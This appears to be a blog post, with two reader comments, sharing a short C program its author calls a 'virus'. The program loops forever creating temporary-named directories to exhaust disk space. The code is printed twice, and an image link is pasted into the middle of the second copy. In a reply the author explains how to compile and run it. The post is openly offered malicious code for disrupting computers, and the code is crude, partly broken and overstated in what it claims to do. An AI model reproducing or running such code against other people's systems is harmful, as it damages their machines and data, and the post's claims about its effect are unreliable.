Hey Folks this is my latest trick ... I have created a new virus that always fill up the HARD DISK space continuously .... This is a simple C program & use a Dev cpp Software to compile and Run the Virus which will automatically do its work ...
/* Virus Program Created by ABHI */
#include<stdio.h>
#include<dir.h>
#include<conio.h>
int main()
{
int i=1,flag,count=1;
char name[30];
printf("created by ABHI !!!");
for(i=0;i<1;)
{
flag=mkdir(tmpnam(name));
if(!flag)
count++;
}
getch();
return ;
}
/* Virus Program Created by ABHI */
#include<stdio.h>
![](http://3.bp.blogspot.com/-FXmjYmDitVE/UHgq7M3oelI/AAAAAAAAAPI/u05ZZPWeAFc/s320/images.jpg)
#include<conio.h>
int main()
{
int i=1,flag,count=1;
char name[30];
printf("created by ABHI !!!");
for(i=0;i<1;)
{
flag=mkdir(tmpnam(name));
if(!flag)
count++;
}
getch();
return ;
}
how to run this virus?
ReplyDeleteSorry For my Late reply ... You just need to compile the program in turboc or Dev cpp and execute the program ... But dont try it in your PC ....
ReplyDelete